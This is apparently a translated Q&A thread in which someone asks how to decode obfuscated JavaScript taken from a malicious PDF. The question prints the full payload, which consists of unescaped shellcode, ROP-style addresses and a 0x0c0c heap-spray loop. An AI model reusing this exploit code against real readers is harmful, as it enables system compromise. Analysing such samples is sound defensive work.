从恶意PDF中提取JavaScript [英] Extract JavaScript from malicious PDF
问题描述
我有一个PDF文件,实际上我知道该文件包含一个JavaScript脚本文件,该文件具有恶意功能,目前还不确定.
I have a PDF file that I know for a fact contains a JavaScript script file that does something malicious, not really sure what at this point.
我已经成功解压缩了PDF文件并获得了纯文本JavaScript源代码,但是如果我以前从未见过这种语法的话,它就是代码本身.
I have successfully uncompressed the PDF file and gotten the plaintext JavaScript source code, but it the code itself if kind of hidden in this syntax I haven't seen before.
代码示例:这是大多数代码的样子
Code example: This is what the majority of the code looks like
var bDWXfJFLrOqFuydrq = unescape;
var QgFjJUluesCrSffrcwUwOMzImQinvbkaPVQwgCqYCEGYGkaGqery = bDWXfJFLrOqFuydrq( '%u4141%u4141%u63a5%u4a80%u0000%u4a8a%u2196%u4a80%u1f90%u4a80%u903c%u4a84%ub692....')
我想这种带有长变量/函数名和隐藏文本字符的表示法会混淆寻找此类事物的扫描仪.
I imagine that this notation with long variable/function names and hidden text characters is to confuse scanners that look for these type of things.
两个问题:
问题1
有人可以告诉我%u4141
叫什么吗?
Can someone tell me what this is called with the %u4141
?
问题2
是否有一些工具可以将该符号转换为纯文本,以便我能看到它在做什么?
Is there some tool that will translate that notation into plaintext so I can see what it is doing?
完整的JS代码:
var B = unescape('%u4141%u4141%u63a5%u4a80%u0000%u4a8a%u2196%u4a80%u1f90%u4a80%u903c%u4a84%ub692%u4a80%u1064%u4a80%u22c8%u4a85%u0000%u1000%u0000%u0000%u0000%u0000%u0002%u0000%u0102%u0000%u0000%u0000%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0008%u0000%ua8a6%u4a80%u1f90%u4a80%u9038%u4a84%ub692%u4a80%u1064%u4a80%uffff%uffff%u0000%u0000%u0040%u0000%u0000%u0000%u0000%u0001%u0000%u0000%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0008%u0000%ua8a6%u4a80%u1f90%u4a80%u9030%u4a84%ub692%u4a80%u1064%u4a80%uffff%uffff%u0022%u0000%u0000%u0000%u0000%u0000%u0000%u0001%u63a5%u4a80%u0004%u4a8a%u2196%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0030%u0000%ua8a6%u4a80%u1f90%u4a80%u0004%u4a8a%ua7d8%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0020%u0000%ua8a6%u4a80%u63a5%u4a80%u1064%u4a80%uaedc%u4a80%u1f90%u4a80%u0034%u0000%ud585%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u000a%u0000%ua8a6%u4a80%u1f90%u4a80%u9170%u4a84%ub692%u4a80%uffff%uffff%uffff%uffff%uffff%uffff%u1000%u0000%uadba%u8e19%uda62%ud9cb%u2474%u58f4%uc931%u49b1%u5031%u8314%ufce8%u5003%u4f10%u72ec%u068a%u8b0f%u784b%u6e99%uaa7a%ufbfd%u7a2f%ua975%uf1c3%u5adb%u7757%u6df4%u3dd0%u4322%uf0e1%u0fea%u9321%u4d96%u7376%u9da6%u728b%uc0ef%u2664%u8fb8%ud6d7%ud2cd%ud7eb%u5901%uaf53%u9e24%u0520%ucf26%u1299%uf760%u7c92%u0651%u9f76%u41ad%u6bf3%u5045%ua2d5%u62a6%u6819%u4a99%u7194%u6ddd%u0447%u8e15%u1efa%uecee%uab20%u57f3%u0ba2%u66d0%ucd67%u6593%u9acc%u69fc%u4fd3%u9577%u6e58%u1f58%u541a%u7b7c%uf5f8%u2125%u0aaf%u8d35%uae10%u3c3d%uc844%u291f%ue6a9%ua99f%u71a5%u9bd3%u296a%u907b%uf7e3%ud77c%u4fd9%u2612%uafe2%ued3a%uffb6%uc454%u94b6%ue9a4%u3a62%u45f5%ufadd%u25a5%u928d%ua9af%u82f2%u63cf%u289b%ue435%u0464%ufd34%u560c%ue837%udf7f%u78d1%u8990%u154a%u9009%u8401%u0fd6%u866c%ua35d%u4990%uce96%u3e82%u8556%ue9f9%u3069%u1597%ubefc%u413e%ubc68%ua567%u3f37%ubd42%ud5fe%uaa2d%u39fe%u2aae%u53a9%u42ae%u070d%u77fd%u9252%u2b91%u1cc7%u98c0%u7440%uc7ee%udba7%u2211%u2036%u0bc4%u50bc%u7862%u417c');
var C = unescape("%"+"u"+"0"+"c"+"0"+"c"+"%u"+"0"+"c"+"0"+"c");
while (C.length + 20 + 8 < 65536) C+=C;
D = C.substring(0, (0x0c0c-0x24)/2);
D += B;
D += C;
E = D.substring(0, 65536/2);
while(E.length < 0x80000) E += E;
F = E.substring(0, 0x80000 - (0x1020-0x08) / 2);
var G = new Array();
for (H=0;H<0x1f0;H++) G[H]=F+"s";
推荐答案
这些可能是内存地址,操作系统调用,堆喷射等.
Those could be memory addresses, OS calls, heap spraying, anything.
线索是所调用的函数是unescape
.要获取实际值,您想unescape
该文本.有用于将文本转义的在线工具,例如 http ://www.web-code.org/coding-tools/javascript-escape-unescape-converter-tool.html .
The clue is that the function that is called is unescape
. To get the actual values you want to unescape
that text. There are online tools for unescaping text, such as http://www.web-code.org/coding-tools/javascript-escape-unescape-converter-tool.html.
结果可能会以ASCII形式出现垃圾,但是您可以尝试将其插入十六进制编辑器,以查看是否可以从中获得更多的意义.如果病毒扫描程序可以识别该文件的感染源,也许您可以对该特定恶意软件进行更多研究,并弄清楚该代码在做什么.
The result will likely be garbage in ASCII, but you can try plugging it into a hex editor to see if you can make any more sense out of it. if a virus scanner can identify the infection source of that file, maybe you can do more research on that particular malware and figure out what that code is doing.
出于科学的考虑,启动Windows VM,运行它,然后看它能做什么:)
In the interest of science, fire up a Windows VM, run it, and see what it does :)
这篇关于从恶意PDF中提取JavaScript的文章就介绍到这了,希望我们推荐的答案对大家有所帮助,也希望大家多多支持IT屋!